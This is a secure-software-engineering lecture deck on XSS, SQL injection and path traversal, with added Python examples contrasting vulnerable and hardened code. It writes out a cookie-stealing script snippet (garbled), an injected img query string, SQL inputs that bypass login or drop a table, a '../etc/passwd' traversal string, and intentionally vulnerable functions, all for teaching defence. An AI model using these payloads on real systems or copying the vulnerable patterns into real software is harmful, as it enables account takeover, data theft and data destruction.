Secure Software Engineering: Input Vulnerabilities
CPSC 410
Input Vulnerabilities
- We all know not to run "code" retrieved from suspicious places
- But passive "data" may be interpreted as malicious instructions:
    System.out.println("/etc/password");
  vs.
    File file = new File("/etc/password");
Three Most Common Input Vulnerabilities on the Web
1. Cross-site Scripting
2. SQL Injection
3. Directory Traversal
See OWASP, the Open Web Application Security Project.
Cross Site Scripting
- Web browsers should only execute JavaScript from sites that you visit
- But ... web sites often echo values given as input, e.g. a name typed into a form appears in the output page: Hello Eric
- If we put JavaScript into an input, an output page could include that JavaScript!
- The tester must assume every data entry point is a possible XSS hole.
Example: Invectus on McDonald's
URL-encoded query parameter:
    queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
Decoded:
    queryText="><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000">
The leading double quote closes the attribute into which the site echoed queryText, so the browser treats the rest of the value as a new img element.
Malicious Script Input
- Basic example (assume URL encoding):
    World")</script>
- Steal user's cookies:
    <script type='text/javascript'>
      var img = document.createElement('img');
      img.setAttribute('src', ' + escape(document.cookie));
      document.body.appendChild(img);
    </script>
GWT Vulnerabilities
- JavaScript on your host page that is unrelated to GWT
- Code you write that sets innerHTML on GWT Widget objects
- Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function)
- JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.)
innerHTML Example
    <html>
    <head>
    <script language="JavaScript">
    function fillMyDiv(newContent) {
      document.getElementById('mydiv').innerHTML = newContent;
    }
    </script>
    </head>
    <body>
    <p>Some text before mydiv.</p>
    <div id="mydiv"></div>
    <p>Some text after mydiv.</p>
    </body>
    </html>
newContent is parsed as the HTML content of mydiv, so if it comes from an untrusted source it can contain arbitrary markup and script, e.g. pop-ups.
GWT Guidelines
- Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code
- Carefully inspect any JavaScript strings you pass to GWT's JSON parser
- Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method
- Take care in your native JSNI methods not to do anything that would expose you to attacks
Cross Site Scripting
Famous Examples
- Obama website redirected to Hillary Clinton
- Twitter pop-ups
- Invectus attacks (over 20 sites)
Best Solution
Filter any data which is echoed back to HTML, e.g.
    String input = request.getParameter("data");
    String clean = new HTMLInputFilter().filter(input);
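Added example (not code from the slides, and not the HTMLInputFilter library they name): the same echo-back pattern written in Python with standard-library escaping, showing the vulnerable page beside the hardened one for both the "Hello Eric" element-body case and the McDonald's attribute-value case. The payloads are constructed from the shapes shown on the slides.

```python
import html

def escape_html(value: str) -> str:
    """Escape & < > " ' so the value can only ever be text, never markup.
    Covers element bodies and double-quoted attributes; JavaScript and URL
    contexts need their own encoders, not this one."""
    return html.escape(value, quote=True)

def render_greeting_unsafe(name: str) -> str:
    """The echoing pattern from the slide: raw input pasted into the page body."""
    return "<p>Hello " + name + "</p>"

def render_greeting(name: str) -> str:
    """Hardened form: the same page, with the value escaped for an element body."""
    return "<p>Hello " + escape_html(name) + "</p>"

def render_search_box(query_text: str) -> str:
    """Echo a query back into a double-quoted attribute (the queryText case).
    Escaping the double quote is what stops the value closing the attribute."""
    return '<input name="queryText" value="' + escape_html(query_text) + '">'

def own_tags_only(rendered: str, expected_tags: int) -> bool:
    """Cheap structural check: after escaping, the only '<' characters left
    are the template's own tags."""
    return rendered.count("<") == expected_tags

# Constructed payloads, reusing the shapes shown on the slides.
SCRIPT_PAYLOAD = 'World")</script>'
IMG_PAYLOAD = '"><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000">'

if __name__ == "__main__":
    print(render_greeting_unsafe(SCRIPT_PAYLOAD))   # closes the script context
    print(render_greeting(SCRIPT_PAYLOAD))          # stays plain text
    print(render_search_box(IMG_PAYLOAD))           # img never becomes an element
```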
Simple Web App
- A Web form that allows the user to look up account details
- Underneath: a Java Web application serving the requests
SQL Injection Example
Happy-go-lucky SQL statement:
    String query = "SELECT Username, UserID, Password FROM Users WHERE Username = '" + user + "' AND Password = '" + password + "'";
- Leads to SQL injection, one of the most common Web application vulnerabilities, caused by lack of input validation
- But how? This is the typical way to construct a SQL query using string concatenation, and it looks benign on the surface
- But let's play with it a bit more...
Injecting Malicious Data (1)
Press "Submit":
    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob' AND Password = '********'"
Injecting Malicious Data (2)
Press "Submit":
    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'-- ' AND Password = ''"
Everything after -- is a SQL comment, so the password check disappears.
Injecting Malicious Data (3)
Press "Submit":
    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'; DROP Users-- ' AND Password = ''"
The ; ends the SELECT, and whatever follows runs as a second statement.
Heart of the Issue: Tainted Input Data
Diagram: evil input from the hacker's browser enters the Web App, reaches the database (SQL injection) and comes back out as output to the browser (cross-site scripting). Tainted input may lead to vulnerabilities: insert validation in the application. Insert input checking!
Bobby Tables
Mitigating SQL Injection
- Always use Prepared Statements or Stored Procedures. Instead of:
    stmt.execute("UPDATE EMPLOYEES SET SALARY = " + input1 + " WHERE ID = " + input2);
  use:
    PreparedStatement pstmt = conn.prepareStatement("UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?");
    pstmt.setBigDecimal(1, input1);
    pstmt.setInt(2, input2);
    pstmt.executeUpdate();
- The account used to make the database connection must have least privilege: if the application only requires read access then the account must be given read access only.
- Avoid disclosing error information: weak error handling is a great way for an attacker to profile SQL injection attacks. Uncaught SQL errors normally give too much information to the user and contain things like table names and procedure names.
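Added example, not from the slides: the login query from the SQL Injection Example slides, rewritten in Python against a constructed in-memory SQLite copy of the Users table, so the "bob'--" input can be run through the concatenated query and then through a prepared (parameterised) one. The plaintext Password column and the two sample rows are assumptions that mirror the slide's schema.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed Users table; plaintext passwords only because the slide's schema has them."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES (1, 'bob', 'hunter2'), (2, 'alice', 's3cret')")
    return conn

def login_concat(conn: sqlite3.Connection, user: str, password: str):
    """Vulnerable: the user's text becomes part of the SQL, so a quote and --
    rewrite the WHERE clause and the password check is commented away."""
    query = ("SELECT Username, UserID FROM Users WHERE Username = '" + user
             + "' AND Password = '" + password + "'")
    return conn.execute(query).fetchone()

def login_prepared(conn: sqlite3.Connection, user: str, password: str):
    """Hardened: ? placeholders; the driver binds the values separately from the
    statement text, so quotes and -- inside them can only ever be data."""
    query = "SELECT Username, UserID FROM Users WHERE Username = ? AND Password = ?"
    return conn.execute(query, (user, password)).fetchone()

def login(conn: sqlite3.Connection, user: str, password: str):
    """Prepared query plus error handling that keeps SQL error text (table and
    procedure names) in the server log instead of the HTTP response."""
    try:
        return login_prepared(conn, user, password)
    except sqlite3.Error as exc:
        print("database error during login: %r" % exc)  # server-side log only
        return None

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "bob'--", ""))    # ('bob', 1): logged in without a password
    print(login_prepared(db, "bob'--", ""))  # None: no user is literally named bob'--
```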
'SQL' Injection on GWT
- More a vulnerability of the RPC services
- Could send arbitrary data to your datastore (once the JavaScript is de-obfuscated)
- Also possible to do JDOQL injection
- Use a Query object and parameters instead of String syntax:
    Query query = pm.newQuery(Employee.class);
    query.setFilter("lastName == lastNameParam");
    query.setOrdering("hireDate desc");
    query.declareParameters("String lastNameParam");
    …
    List<Employee> results = (List<Employee>) query.execute("Smith");
    query.closeAll();
Recent Examples
- On March 27, 2011, mysql.com, the official homepage for MySQL, was compromised
- On June 1, 2011, LulzSec stole information from Sony PS3 users
- In August 2011, a hacker stole user records from the Nokia Developer site
Directory/Path Traversal
Occurs when user input is used to create the path for reading a file on disk:
    String file = request.getParameter("photo");
    File photo = new File("/images/" + file);
Directory Traversal
- Malicious input has been used to retrieve:
  - "web.xml" files
  - Apache conf files
  - UNIX password files
- Other example: you let the user choose between different style templates and save the template filename in their profile
Example 2
    http://some_site.com.br/get-files.jsp?file=report.pdf
In these examples it's possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
Best Solution
- Don't construct file paths from user input
- Understand how your web server handles file access
- Create a UUID (Universally Unique IDentifier) for each file and save it as a column with the data:
    String uuid = UUID.randomUUID().toString();
    File savedFile = new File(uuid);
- Example database table for images: picID, picName, picDesc, picOwner, picFormat, uuid
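Added example, not from the slides: both defences for the photo lookup above, in Python. resolve_under is the canonical-path containment check for code that still has to take a filename, and ImageStore is the slide's UUID approach, where the client's string is only ever a dictionary key and never part of a path. The base directory /srv/app/images and the in-memory table are constructed assumptions standing in for the slide's /images/ and its picID ... uuid columns.

```python
import os
import uuid

IMAGE_DIR = "/srv/app/images"   # constructed base directory, in place of the slide's "/images/"

def resolve_under(base_dir: str, user_path: str):
    """Return the absolute path of user_path inside base_dir, or None if it escapes.
    realpath collapses ../ and follows symlinks; os.path.join discards base_dir when
    user_path is absolute, so that case is caught by the same comparison. commonpath
    compares whole components, so /srv/app/images2 is not mistaken for a child of
    /srv/app/images the way a plain startswith() check would."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

class ImageStore:
    """The slide's alternative: never build a path from user input; look the file
    up by a server-generated UUID. The dict stands in for the picID..uuid table."""
    def __init__(self, base_dir: str):
        self.base_dir = base_dir
        self._by_id = {}   # uuid -> (picName, picFormat)

    def add(self, pic_name: str, pic_format: str) -> str:
        pic_id = str(uuid.uuid4())
        self._by_id[pic_id] = (pic_name, pic_format)
        return pic_id

    def path_for(self, pic_id: str):
        """Only a known UUID reaches the filesystem; anything else is rejected."""
        if pic_id not in self._by_id:
            return None
        return os.path.join(self.base_dir, pic_id)

if __name__ == "__main__":
    print(resolve_under(IMAGE_DIR, "cat.png"))              # /srv/app/images/cat.png
    print(resolve_under(IMAGE_DIR, "../../../etc/passwd"))  # None
    store = ImageStore(IMAGE_DIR)
    print(store.path_for(store.add("cat.png", "png")))      # /srv/app/images/<uuid>
```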
2 Rules to Remember
- Always assume many users are malicious and want to break your software
- Don't assume a Web site is always accessed through a normal Web Browser
Famous last words: "I wrote the JavaScript so that this would never happen"